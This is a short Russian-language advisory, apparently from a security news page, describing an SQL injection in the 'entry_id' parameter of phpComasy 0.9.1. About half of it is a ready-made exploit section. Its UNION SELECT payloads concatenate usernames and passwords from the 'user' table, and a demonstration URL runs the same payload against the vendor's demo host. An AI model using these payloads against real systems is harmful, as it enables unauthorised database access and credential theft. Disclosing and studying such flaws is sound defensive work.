Программа: phpComasy 0.9.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «entry_id». Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://localhost/Path/?id=22&entry_id=[SQL-injection]

-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user—
или
-9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user—&mod_action=detail

Демонстрация:

http://demo.phpcomasy.com/?id=22&entry_id=-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user—&mod_action=detail



Оставить мнение